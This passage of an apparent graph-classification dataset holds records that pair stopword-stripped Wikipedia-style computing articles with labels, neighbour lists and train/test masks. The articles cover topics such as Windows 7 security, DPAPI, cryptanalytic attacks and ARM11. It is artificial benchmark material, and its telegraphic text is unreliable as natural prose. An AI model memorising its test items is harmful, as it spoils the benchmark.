introduced windows vista playback mpeg-2 dolby digital decode h.264 aac he-aac v1 v2 dolby digital plus including downmixing dolby digital action center formerly windows security center encompasses security maintenance called windows health center windows solution center earlier builds new user interface user account control introduced provides ability select four different levels notifications one notification settings default new windows 7 geo-tracking capabilities also available windows 7 feature disabled default enabled user limited control applications track location encrypting file system supports elliptic-curve cryptographic algorithms ecc windows 7 backward compatibility previous releases windows windows 7 supports mixed-mode operation ecc rsa algorithms efs self-signed certificates using ecc use 256-bit key default efs configured use 1k/2k/4k/8k/16k-bit keys using self-signed rsa certificates 256/384/512-bit keys using ecc certificates windows vista protected user-mode audio puma content protection facilities available applications running protected media path environment media foundation application programming interface could interact environment media player application designed use media foundation windows 7 restriction lifted puma also incorporates stricter enforcement copy never bits using serial copy management system scms copy protection s/pdif connection well high-bandwidth digital content protection hdcp hdmi connections windows 7 includes new windows biometric framework framework consists set components standardizes use fingerprint biometric devices prior releases microsoft windows biometric hardware device manufacturers required provide complete stack software support device including device drivers software development kits support applications microsoft noted white paper windows biometric framework proliferation proprietary stacks resulted compatibility issues compromised quality reliability system made servicing maintenance difficult incorporating core biometric functionality operating system microsoft aims bring biometric device support par classes devices new control panel called biometric device control panel included provides interface deleting stored biometrics information troubleshooting enabling disabling types logins allowed using biometrics biometrics configuration also configured using group policy settings alongside workgroup system used previous versions windows 7 adds new ad hoc home networking system known homegroup system uses password join computers group allows users libraries along individual files folders shared multiple computers computers running windows 7 windows 10 version 1709 create join homegroup windows homegroup home network feature support deprecated windows 10 removed windows 10 version 1803 later homegroup concept similar feature slated windows vista known castle would made possible identification service members network without centralized server homegroup created response need simple sharing model inexperienced users need share files without wrestling user accounts security descriptors share permissions end microsoft previously created simple file sharing mode windows xp enabled caused connected computers authenticated guest model either certain file folder shared anyone connects network even unauthorized parties range wireless network shared homegroup however windows 7 adds support multiple firewall profiles windows firewall windows vista dynamically changes network traffic allowed blocked based location computer based network connected approach falls short computer connected one network time computer ethernet wireless interface case vista applies profile secure network connections often desirable windows 7 resolves able apply separate firewall profile network connection windows 7 windows server 2008 r2 introduce support domain name system security extensions dnssec set specifications securing certain kinds information provided domain name system dns used internet protocol ip networks dnssec employs digital signatures ensure authenticity dns data received dns server protect dns cache poisoning attacks windows 7 contains windows powershell 2.0 out-of-the-box also available download install older platforms new management features include windows 7 includes internet explorer 8 .net framework 3.5 sp1 internet information services iis 7.5 windows installer 5.0 standalone xps viewer paint calculator resource monitor wordpad also updated paint features ribbon interface similar one introduced office 2007 also sports several new features calculator rewritten multiline capabilities including programmer statistics modes unit conversion date calculations calculator also given graphical facelift first since windows 95 1995 windows nt 4.0 1996 wordpad also features new ribbon user interface wordpad supports office open xml odf file formats resource monitor includes improved ram usage display supports display tcp/ip ports listened filtering processes using networking filtering processes disk activity listing searching process handles e.g files used process loaded modules files required executable file e.g dll files microsoft magnifier accessibility utility low vision users dramatically improved magnifier supports full screen zoom feature whereas previous windows versions magnifier attached top screen dock layout new full screen feature enabled default however requires windows aero advantage full screen zoom feature windows set windows 7 basic windows classic high contrast themes magnifier still function like windows vista earlier windows installer 5.0 supports installing configuring windows services provides developers control setting permissions software installation neither features available prior versions windows custom actions support features continue required windows installer packages need implement features",
    "neighbors": [
      6150,
      11283,
      537,
      7713,
      6690,
      11301,
      6697,
      1581,
      1077,
      582,
      1098,
      4174,
      10831,
      4178,
      8798,
      10338,
      8296,
      5225,
      8299,
      622,
      4210,
      7796,
      5749,
      6265,
      5754,
      8315,
      636,
      639,
      641,
      8328,
      651,
      6797,
      10896,
      9874,
      2196,
      3742,
      3250,
      9910,
      2749,
      10957,
      3289,
      4316,
      11487,
      4321,
      5857,
      4836,
      9448,
      1770,
      10989,
      7411,
      4340,
      2811,
      7421,
      6927,
      8976,
      3857,
      7972,
      6441,
      3890,
      6972,
      10557,
      4926,
      6462,
      321,
      2887,
      11605,
      2391,
      4439,
      5470,
      10079,
      5472,
      11103,
      2402,
      2919,
      8576,
      3463,
      9609,
      9612,
      2959,
      8080,
      11667,
      9620,
      4505,
      929,
      4515,
      3496,
      430,
      9655,
      1978,
      7615,
      7106,
      3027,
      9173,
      10207,
      5600,
      6114,
      4074,
      5103,
      3573,
      10229,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 652,
    "label": 6,
    "text": "Gpart:gpart gpart software utility scans storage device examining data order detect partitions may exist absent disk partition tables gpart written michail brzitwa germany release author website older releases distributions using appears michail brzitwa actively maintain code instead various distributions i.e fedora debian appear maintain versions gpart tries guess partitions device partitioned even file primary partition table lost overwritten destroyed partitions still exist media operating system access gpart ignores primary partition table scans disk disk image file sector sector several filesystem/partition types asking filesystem recognition modules think given sequence sectors resembles beginning filesystem partition type michail brzitwa man page gpart 8 linux man page january 2001 list modules listed also modules written future filesystems used detection process recovering partitions needed damaged bootable disk machine live cd used knoppix start machine use utilities disk also good finding listing types locations sizes inadvertently-deleted partitions primary logical gives information need manually re-create using fdisk cfdisk sfdisk etc. guessed partition table also written file firmly believe guessed table entirely correct directly disk device badly damaged devices good idea use utility ddrescue make backup copy device use gpart guess partitions copy successful try writing back device may find using ddrescue get read errors device damaged get partitions readable copy try using mount unix retrieve data copy mount partition offset part offset /mnt/loop recover data file get partition offset use either fdisk -ul /path/to/imagefile use output gpart look sample output size line last pair round brackets start 16 end 3906559 specifying offset always specify start sample output scan 8gb flash memory stick two partitions one fat16b 2gb partition one xfs 6gb partition supported guessable filesystem partition types",
    "neighbors": [
      451,
      3366,
      7983,
      2545,
      5397,
      2550,
      9335,
      9693,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 653,
    "label": 2,
    "text": "Data_Protection_API:data protection api dpapi data protection application programming interface simple cryptographic application programming interface available built-in component windows 2000 later versions microsoft windows operating systems theory data protection api enable symmetric encryption kind data practice primary use windows operating system perform symmetric encryption asymmetric private keys using user system secret significant contribution entropy nearly cryptosystems one difficult challenges key management part securely store decryption key key stored plain text user access key access encrypted data key encrypted another key needed dpapi allows developers encrypt keys using symmetric key derived user logon secrets case system encryption using system domain authentication secrets dpapi keys used encrypting user rsa keys stored codice_1 directory sid security identifier user dpapi key stored file master key protects users private keys usually 64 bytes random data 2010 elie bursztein jean-michel picod presented analysis protocol titled reversing dpapi stealing windows secrets offline black hat dc 2010 addition briefing bursztein picod released dpapick allows offline decryption data encrypted dpapi 2012 passcape software published blog detailed article dpapi internal logic presented tool fully offline dpapi decryption analysis unlike previous one tool utilizes old windows bugs example decrypt windows 2000 dpapi blobs without knowing owner logon password fully compatible windows 8 dpapi data structure windows 8 microsoft changed way dpapi logic works multiple user keys used derive encryption key decrypt user masterkey used decode single dpapi blob windows 10 critical flaw dpapi implementation allows decrypting dpapi-encrypted data last active user account dpapi n't store persistent data instead simply receives plaintext returns ciphertext vice versa dpapi security relies upon windows operating system ability protect master key rsa private keys compromise attack scenarios highly reliant security end user credentials main encryption/decryption key derived user password pbkdf2 function particular data binary large objects encrypted way salt added and/or external user-prompted password aka strong key protection required use salt per-implementation option i.e control application developer controllable end user system administrator delegated access given keys use com+ object enables iis web servers use dpapi universally implemented microsoft products use dpapi microsoft products increased successive version windows however many applications microsoft third-party developers still prefer use protection approach recently switched use dpapi example internet explorer versions 4.0-6.0 outlook express msn explorer used older protected storage pstore api store saved credentials passwords etc internet explorer 7 protects stored user credentials using dpapi",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      6770,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      3723,
      5259,
      6797,
      3224,
      4771,
      7846,
      10414,
      8368,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      225,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      1297,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1348,
      844,
      4439,
      10079,
      7520,
      11616,
      8052,
      2943,
      9609,
      6028,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      6584,
      1978,
      2493,
      7629,
      1498,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 654,
    "label": 6,
    "text": "Compact_Disc_File_System:compact disc file system compact disc file system cdfs file system read-only write-once cd-roms developed simson garfinkel j. spencer love mit media lab 1985 1986 file system provided creation modification renaming deletion files directories write-once media file system developed write-once cd-rom simulator used master one first cd-roms 1986 cdfs never sold source code published internet cd-roms distributed media lab sponsors file system basis wofs write-once file system sold n/hance systems 1989",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 655,
    "label": 9,
    "text": "Variable_(computer_science):variable computer science computer programming variable scalar storage location identified memory address paired associated symbolic name identifier contains known unknown quantity information referred value variable name usual way reference stored value addition referring variable depending context separation name content allows name used independently exact information represents identifier computer source code bound value run time value variable may thus change course program execution variables programming may directly correspond concept variables mathematics latter abstract reference physical object storage location value computing variable necessarily part equation formula mathematics variables computer programming frequently given long names make relatively descriptive use whereas variables mathematics often terse one- two-character names brevity transcription manipulation variable storage location may referred several different identifiers situation known aliasing assigning value variable using one identifiers change value accessed identifiers compilers replace variables symbolic names actual locations data variable name type location often remain fixed data stored location may changed program execution imperative programming languages values generally accessed changed time pure functional logic languages variables bound expressions keep single value entire lifetime due requirements referential transparency imperative languages behavior exhibited named constants symbolic constants typically contrasted normal variables depending type system programming language variables may able store specified datatype e.g integer string alternatively datatype may associated current value allowing single variable store anything supported programming language variables scope automatic variables local variable function comes existence function called disappears function exited variables known automatic variables b external variables variables external function accessed name function variables remain existence permanently rather appearing disappearing functions called exited retain values even functions set returned identifier referencing variable used access variable order read value alter value edit attributes variable access permission locks semaphores etc instance variable might referenced identifier codice_1 variable contain number 1956 variable referenced identifier codice_2 well using identifier codice_2 value variable altered 2009 reading value using identifier codice_1 yield result 2009 1956 variable referenced single identifier simply called name variable otherwise speak one names variable instance previous example codice_1 name variable question codice_2 another name variable scope variable describes program text variable may used extent lifetime describes program execution variable meaningful value scope variable actually property name variable extent property variable confused context also called environment property program varies point source code execution – see scope overview object lifetime may coincide variable lifetime many cases tied variable lifetime variable name scope affects extent scope important part name resolution variable languages define specific scope variable well named entity may differ within given program scope variable portion program code variable name meaning variable said visible entrance scope typically begins variable lifetime comes context exit scope typically ends lifetime goes context instance variable lexical scope meaningful within certain function/subroutine finely within block expressions/statements accordingly function scope block scope static resolution performable parse-time compile-time alternatively variable dynamic scope resolved run-time based global binding stack depends specific control flow variables accessible within certain functions termed local variables global variable one indefinite scope may referred anywhere program extent hand runtime dynamic aspect variable binding variable value extent runtime extent binding portion program execution time variable continues refer value memory location running program may enter leave given extent many times case closure unless programming language features garbage collection variable whose extent permanently outlasts scope result memory leak whereby memory allocated variable never freed since variable would used reference deallocation purposes longer accessible however permissible variable binding extend beyond scope occurs lisp closures c static local variables execution passes back variable scope variable may used variable whose scope begins extent said uninitialized often undefined arbitrary value accessed see wild pointer since yet explicitly given particular value variable whose extent ends scope may become dangling pointer deemed uninitialized since value destroyed variables described previous two cases may said extent unbound many languages error try use value variable extent languages may yield unpredictable results variable may however assigned new value gives new extent space efficiency memory space needed variable may allocated variable first used freed longer needed variable needed scope thus beginning variable lifetime enters scope may give space unused variables avoid wasting space compilers often warn programmers variable declared used considered good programming practice make scope variables narrow feasible different parts program accidentally interact modifying variables also prevents action distance common techniques different sections program use different name spaces make individual variables private either dynamic variable scoping lexical variable scoping many programming languages employ reserved value often named null nil indicate invalid uninitialized variable statically typed languages java ml variable also type meaning certain kinds values stored example variable type integer prohibited storing text values dynamically typed languages python values variables carry type common lisp situations exist simultaneously variable given type undeclared assumed codice_7 universal supertype exists compile time values also types checked queried runtime typing variables also allows polymorphisms resolved compile time however different polymorphism used object-oriented function calls referred virtual functions c++ resolves call based value type opposed supertypes variable allowed variables often store simple data like integers literal strings programming languages allow variable store values datatypes well languages may also enable functions parametric polymorphic functions operate like variables represent data multiple types example function named codice_8 may determine length list codice_8 function may parametric polymorphic including type variable type signature since number elements list independent elements types formal parameters formal arguments functions also referred variables instance python code segment variable named codice_10 parameter given value function called integer 5 argument gives codice_10 value languages function parameters local scope specific variable named codice_10 referred within codice_13 function though course functions also variables called codice_10 specifics variable allocation representation values vary widely among programming languages among implementations given language many language implementations allocate space local variables whose extent lasts single function call call stack whose memory automatically reclaimed function returns generally name binding name variable bound address particular block contiguous sequence bytes memory operations variable manipulate block referencing common variables whose values large unknown sizes code compiled variables reference location value instead storing value allocated pool memory called heap bound variables values value however abstraction idea implementation value represented data object stored somewhere computer memory program runtime environment must set aside memory data object since memory finite ensure memory yielded reuse object longer needed represent variable value objects allocated heap must reclaimed—especially objects longer needed garbage-collected language c java python golang lisp runtime environment automatically reclaims objects extant variables longer refer non-garbage-collected languages c program programmer must explicitly allocate memory later free reclaim memory failure leads memory leaks heap depleted program runs risks eventual failure exhausting available memory variable refers data structure created dynamically components may indirectly accessed variable circumstances garbage collectors analogous program features languages lack garbage collectors must deal case portion memory reachable variable needs reclaimed unlike mathematical counterparts programming variables constants commonly take multiple-character names e.g codice_15 codice_16 single-character names commonly used auxiliary variables instance codice_17 codice_18 codice_19 array index variables naming conventions enforced language level part language syntax involves format valid identifiers almost languages variable names start digit 0–9 contain whitespace characters whether punctuation marks permitted variable names varies language language many languages permit underscore variable names forbid punctuation programming languages sigils symbols punctuation affixed variable identifiers indicate variable datatype scope case-sensitivity variable names also varies languages languages require use certain case naming certain entities modern languages case-sensitive older languages languages reserve certain forms variable names internal use many languages names beginning two underscores __ often fall category however beyond basic restrictions imposed language naming variables largely matter style machine code level variable names used exact names chosen matter computer thus names variables identify rest tool programmers make programs easier write understand using poorly chosen variable names make code difficult review non-descriptive names names clear often encouraged programmers often create adhere code style guidelines offer guidance naming variables impose precise naming scheme shorter names faster type less descriptive longer names often make programs easier read purpose variables easier understand however extreme verbosity variable names also lead less comprehensible code terms classifications variables classify variables based lifetime different types variables static stack-dynamic explicit heap-dynamic implicit heap-dynamic static variable also known global variable bound memory cell execution begins remains memory cell termination typical example static variables c c++ stack-dynamic variable known local variable bound declaration statement executed deallocated procedure returns main examples local variables c subprograms java methods explicit heap-dynamic variables nameless abstract memory cells allocated deallocated explicit run-time instructions specified programmer main examples dynamic objects c++ via new delete objects java implicit heap-dynamic variables bound heap storage assigned values allocation release occur values reassigned variables result implicit heap-dynamic variables highest degree flexibility main examples variables javascript php variables apl",
    "neighbors": [
      1152,
      2304,
      2817,
      11269,
      3462,
      4486,
      8582,
      3722,
      3725,
      2062,
      10510,
      6160,
      6674,
      10771,
      5783,
      5911,
      9497,
      11674,
      10011,
      8221,
      6430,
      10145,
      1954,
      547,
      3876,
      7076,
      9002,
      5677,
      5040,
      8369,
      3890,
      10547,
      692,
      7862,
      3767,
      11574,
      10043,
      10555,
      4797,
      1343,
      6335,
      4674,
      5059,
      8644,
      8773,
      3910,
      8262,
      9794,
      3529,
      3402,
      7756,
      8531,
      10581,
      7421,
      6502,
      6633,
      8554,
      5361,
      2936,
      380,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 656,
    "label": 5,
    "text": "DCF_Interframe_Space:dcf interframe space ieee 802.11 family standards describe dcf protocol controls access physical medium station must sense status wireless medium transmitting finds medium continuously idle dcf interframe space difs duration permitted transmit frame channel found busy difs interval station defer transmission difs duration calculated following method difs sifs 2 slot time ieee 802.11g backward compatible ieee 802.11b devices associated ap timing parameters changed 802.11b",
    "neighbors": [
      11560,
      8708
    ],
    "mask": "Test"
  },
  {
    "node_id": 657,
    "label": 2,
    "text": "Patrick_Volkerding:patrick volkerding patrick volkerding born october 20 1966 founder maintainer slackware linux distribution volkerding slackware benevolent dictator life bdfl also known informally man volkerding earned bachelor science computer science minnesota state university moorhead 1993 volkerding deadhead april 1994 already attended 75 concerts volkerding church subgenius affiliate/member use word slack slackware homage j. r. bob dobbs subgenius influence slackware volkerding stated 'll admit subgenius inspired fact back 2.0 3.0 days used print dobbshead cd volkerding avid homebrewer beer lover early versions slackware would entreat users send bottle local beer appreciation work volkerding married 2001 andrea daughter briah cecilia volkerding b 2005 2004 volkerding announced via mailing list post suffering actinomycosis serious illness requiring multiple rounds antibiotics uncertain prognosis announcement caused number tech news outlets wonder future slackware project 2012 volkerding slackware project reported healthy state short chris lumens others assisted work slackware due lack continuing revenue stream following sale publisher walnut creek cdrom bsdi ultimately sold wind river systems people let go last several years volkerding managed slackware help many volunteers testers 2014 volkerding received o'reilly open source award",
    "neighbors": [
      1026,
      7938,
      7812,
      8326,
      4360,
      5644,
      4493,
      4367,
      912,
      8848,
      9743,
      1939,
      2195,
      1813,
      2581,
      3478,
      6808,
      10642,
      7450,
      11155,
      10780,
      1694,
      5534,
      6302,
      7584,
      802,
      3618,
      5410,
      6691,
      5670,
      6947,
      8354,
      9507,
      10149,
      4011,
      5931,
      8364,
      9646,
      1717,
      823,
      6583,
      9660,
      2109,
      11069,
      10687,
      10817,
      10822,
      8263,
      843,
      5067,
      589,
      3791,
      6352,
      4177,
      11602,
      8147,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      1761,
      11232,
      4841,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "Test"
  },
  {
    "node_id": 658,
    "label": 4,
    "text": "Davies_attack:davies attack cryptography davies attack dedicated statistical cryptanalysis method attacking data encryption standard des attack originally created 1987 donald davies 1994 eli biham alex biryukov made significant improvements technique known-plaintext attack based non-uniform distribution outputs pairs adjacent s-boxes works collecting many known plaintext/ciphertext pairs calculating empirical distribution certain characteristics bits key deduced given sufficiently many known plaintexts leaving remaining bits found brute force tradeoffs number required plaintexts number key bits found probability success attack find 24 bits key 2 known plaintexts 53 success rate davies attack adapted feistel ciphers besides des 1998 pornin developed techniques analyzing maximizing cipher resistance kind cryptanalysis",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      8627,
      2357,
      10806,
      1847,
      9528,
      2110,
      9156,
      9541,
      10315,
      6863,
      4561,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "None"
  },
  {
    "node_id": 659,
    "label": 3,
    "text": "ARM11:arm11 arm11 group older 32-bit risc arm processor cores licensed arm holdings arm11 core family consists arm1136j f -s arm1156t2 f -s arm1176jz f -s arm11mpcore since arm11 cores released 2002 2005 longer recommended new ic designs instead arm cortex-a arm cortex-r cores preferred arm11 microarchitecture announced 29 april 2002 introduced armv6 architectural additions announced october 2001 include simd media instructions multiprocessor support new cache architecture implementation included significantly improved instruction processing pipeline compared previous arm9 arm10 families used smartphones apple nokia others initial arm11 core arm1136 released licensees october 2002 arm11 family currently armv6-architecture cores however armv6-m cores cortex-m0 cortex-m1 addressing microcontroller applications arm11 cores target demanding applications terms instruction set arm11 builds preceding arm9 generation incorporates arm926ej-s features adds armv6 instructions media support simd accelerating irq response microarchitecture improvements arm11 cores include jtag debug support halting stepping breakpoints watchpoints simplified embeddedice module replaced interface became part armv7 architecture hardware tracing modules etm etb compatible updated versions used arm9 particular trace semantics updated address parallel instruction execution data transfers arm makes effort promote good verilog coding styles techniques ensures semantically rigorous designs preserving identical semantics throughout chip design flow included extensive use formal verification techniques without attention integrating arm11 third-party designs could risk exposing hard-to-find latent bugs due arm cores integrated many different designs using variety logic synthesis tools chip manufacturing processes impact register-transfer level rtl quality magnified many times arm11 generation focused synthesis previous generations making concerns issue four arm11 cores",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      10784,
      1057,
      4132,
      38,
      4139,
      8237,
      9774,
      10802,
      7220,
      8250,
      8253,
      6207,
      7745,
      7747,
      2635,
      1615,
      8794,
      6748,
      99,
      8812,
      4211,
      5237,
      630,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      1170,
      9366,
      7833,
      666,
      5786,
      669,
      4258,
      4773,
      5290,
      10410,
      9391,
      9913,
      7866,
      5823,
      8383,
      10945,
      199,
      4821,
      6878,
      2273,
      9443,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      5381,
      781,
      4887,
      6949,
      5417,
      2862,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      10053,
      5963,
      1871,
      1872,
      5457,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      11125,
      8058,
      11655,
      392,
      398,
      1428,
      7063,
      4508,
      2979,
      5028,
      7077,
      9638,
      10675,
      3511,
      1471,
      7617,
      9155,
      9163,
      7631,
      464,
      6608,
      980,
      3028,
      9174,
      9685,
      10199,
      4569,
      3547,
      2524,
      9182,
      5617,
      1014,
      3575
    ],
    "mask": "Train"
  },
  {
    "node_id": 660,
    "label": 4,
    "text": "Rebound_attack:rebound attack rebound attack tool cryptanalysis cryptographic hash functions attack first published 2009 florian mendel christian rechberger martin schläffer søren thomsen conceived attack aes like functions whirlpool grøstl later shown also applicable designs keccak jh skein rebound attack type statistical attack hash functions using techniques rotational differential cryptanalysis find collisions interesting properties basic idea attack observe certain differential characteristic block cipher part permutation another type primitive finding values fulfilling characteristic achieved splitting primitive formula_1 three parts formula_2 formula_3 called inbound phase formula_4 formula_5 together called outbound phase attacker chooses values realize part differential characteristic inbound phase deterministically fulfill remainder characteristic probabilistic manner thus rebound attack consists 2 phases advantage using inbound two outbound phases ability calculate difficult parts differential characteristic inbound phase efficient way furthermore ensures high probability outbound phase overall probability finding differential characteristic thus becomes higher using standard differential techniques consider hash function uses aes-like substitution-permutation block cipher compression function compression function consists number rounds composed s-boxes linear transformations general idea attack construct differential characteristic computationally expensive part middle part covered inbound phase whereas easily achieved part characteristic covered outbound phase system equations describe characteristic inbound phase underdetermined many starting points outbound phase generated since difficult part characteristic contained inbound phase possible use standard differentials whereas truncated differentials used outbound phase achieve higher probabilities inbound phase typically number active state bytes bytes non-zero differences beginning propagate large number active bytes middle round returning low number active bytes end phase idea large number active bytes input output s-box middle phase characteristics efficiently computed choosing values differences start end inbound phase propagating towards middle looking matches input output s-box aes like ciphers typically done row- column-wise making procedure relatively efficient choosing different starting ending values leads many different differential characteristics inbound phase outbound phase goal propagate characteristics found inbound phase backwards forwards check whether desired characteristics followed truncated differentials usually used give higher probabilities specific values differences irrelevant goal finding collision probability characteristic following desired pattern outbound phase depends number active bytes arranged characteristic achieve collision enough differentials outbound phase specific type active bytes start end characteristic must also value feed-forward operation cancelled therefore designing characteristic number active bytes start end outbound phase position probability bytes cancelling adds probability outbound characteristic overall necessary generate sufficiently many characteristics inbound phase order get expected number correct characteristics larger one outbound phase furthermore near-collisions higher number rounds achieved starting ending outbound phase several active bytes cancel rebound attack used hash function whirlpool find collisions variants compression function aes-like block cipher w reduced 4.5 5.5 rounds near-collisions found 6.5 7.5 rounds description 4.5 round attack make rebound attack effective look-up table s-box differences computed attack let formula_6 represent s-box pair formula_7 find solutions formula_8 equation formula_10 represents input difference formula_11 represents output difference s-box 256 256 table called difference distribution table ddt makes possible find values follow characteristic specific input/output pairs go s-box table right show possible number solutions equation often occur first row describes impossible differentials whereas last row describes zero-differential find collision 4.5 rounds whirlpool differential characteristic type shown table must found characteristic minimum active bytes bytes non-zero differences marked red characteristic described number active bytes round e.g 1 → 8 → 64 → 8 → 1 → 1 goal inbound phase find differences fulfill part characteristic described sequence active bytes 8 → 64 → 8 done following three steps steps repeated 2 different starting values step 1 resulting total 2 actual values follow differential characteristic inbound phase set 2 values found complexity 2 round transformations due precomputation step outbound phase completes differential characteristic probabilistic way outbound phase uses truncated differentials opposed inbound phase starting point found inbound phase propagated forwards backwards order follow desired characteristic 8 active bytes must propagate single active byte directions one 8 1 transition happens probability 2 fulfilling characteristic probability 2 ensure collision values start end characteristic cancel feed-forward operation happens probability approximately 2 overall probability outbound phase therefore 2 find collision 2 starting points generated inbound phase since done average complexity 1 per starting point overall complexity attack 2 basic 4.5 round attack extended 5.5 round attack using two fully active states inbound phase increases complexity 2 extending outbound phase begins ends 8 active bytes leads near-collision 52 bytes whirlpool reduced 7.5 rounds complexity 2 assuming attacker control chaining value therefore input key-schedule whirlpool attack extended 9.5 rounds semi-free-start near-collision 52 bytes complexity 2",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      6954,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 661,
    "label": 6,
    "text": "Storage@home:storage home storage home distributed data store project designed store massive amounts scientific data across large number volunteer machines project developed folding home team stanford university 2007 2011 scientists running folding home deal massive amounts data must stored backed expensive traditionally methods storing data raid servers used become impractical research budgets scale pande research group already dealt storing hundreds terabytes scientific data professor vijay pande student adam beberg took experience folding home began work storage home project designed based distributed file system known cosm workload analysis needed folding home results folding home volunteers easily participate storage home much disk space needed user folding home create robust network volunteers donate 10 gb storage space would hold encrypted files users gain points reward reliable storage file saved system replicated four times spread across 10 geographically distant hosts redundancy also occurs different operating systems across time zones servers detect disappearance individual contributor data blocks held user would automatically duplicated hosts ideally users would participate minimum six months would alert storage home servers certain changes end planned move machine bandwidth downgrade data stored storage home maintained redundancy monitoring repairs done needed careful application redundancy encryption digital signatures automated monitoring correction large quantities data could reliably easily retrieved ensures robust network lose least possible data storage resource broker closest storage project storage home storage home first made available september 15 2009 testing phase first monitored availability data basic statistics user machine would used create robust capable storage system storing massive amounts scientific data however year became inactive despite initial plans come april 11 2011 pande stated group active plans storage home",
    "neighbors": [
      1449,
      6797,
      7983,
      499,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 662,
    "label": 7,
    "text": "Cloud_printing:cloud printing cloud printing technology enables printers accessed network cloud computing essence two kinds cloud printing one hand consumer-based cloud printing connects application cloud-enabled home printers people access using technology people take digital media primary communications tool create printed page need content physical form hand professional cloud printing enables publishers companies content owners print digital publications leveraging networks production facilities cloud computing technology short professional cloud printing allows ad-hoc transformation digital information physical forms 2d 3d consumers cloud ready printers eliminate need pc connections print drivers enabling print mobile devices publishers content owners cloud printing allows avoid cost complexity buying managing underlying hardware software processes required production professional print products leveraging cloud print print demand also allows businesses cut costs associated mass production moreover cloud printing considered eco-friendly significantly reduces amount paper used lowers carbon emissions transportation handful providers currently working towards professional cloud print solution operate niche focus mobile devices significantly large steps also taken consumer market google cloud print leading companies like konica minolta xerox ricoh followed google ’ footsteps mobile cloud solutions hewlett-packard implemented similar mechanism eprint solution additionally independent software vendors like printix leveraging cloud computing technology offer cloud-based print infrastructure cloud-based printing software service saas solutions may integrations cloud enabled printers provide printing via cloud features allow users print networks printers isolated network otherwise reachable user computer industry experts believe services become popular users longer consider printers necessary assets rather devices access demand need generate printed page presents cloud printing options simplify printing process print data must travel public cloud makes journey device printer also means printing possible cloud slow connection outage since clouds charge inbound and/or outbound traffic heavy print jobs significant cost true cloud print solutions require on-premise server company complementing cloud whether print server application server gateway service today many solution providers interface on-premise server cloud database label cloud print solution",
    "neighbors": [
      5689,
      4194,
      9961
    ],
    "mask": "Test"
  },
  {
    "node_id": 663,
    "label": 3,
    "text": "IBM_System/360_architecture:ibm system/360 architecture ibm system/360 architecture model independent architecture entire s/360 line mainframe computers including limited instruction set architecture elements architecture documented ibm system/360 principles operation ibm system/360 i/o interface channel control unit original equipment manufacturers information manuals system/360 architecture provides following features memory storage system/360 addressed terms 8-bit bytes various instructions operate larger units called halfword 2 bytes fullword 4 bytes doubleword 8 bytes quad word 16 bytes 2048 byte storage block specifying leftmost lowest address unit within halfword fullword doubleword quadword low numbered bytes significant high numbered bytes sometimes referred big-endian many uses units require aligning corresponding boundaries within article unqualified term word refers fullword original architecture system/360 provided 2 16,777,216 bytes memory later model 67 extended architecture allow 2 4,294,967,296 bytes virtual memory system/360 uses truncated addressing means instructions contain complete addresses rather specify base register positive offset addresses base registers case system/360 base address contained one 15 general registers instructions example shifts computations performed 32-bit quantities addresses s/360 architecture defines formats characters integers decimal integers hexadecimal floating point numbers character integer instructions mandatory decimal floating point instructions part decimal arithmetic floating-point arithmetic features instructions s/360 two four six bytes length opcode byte 0 instructions one following formats instructions must two-byte 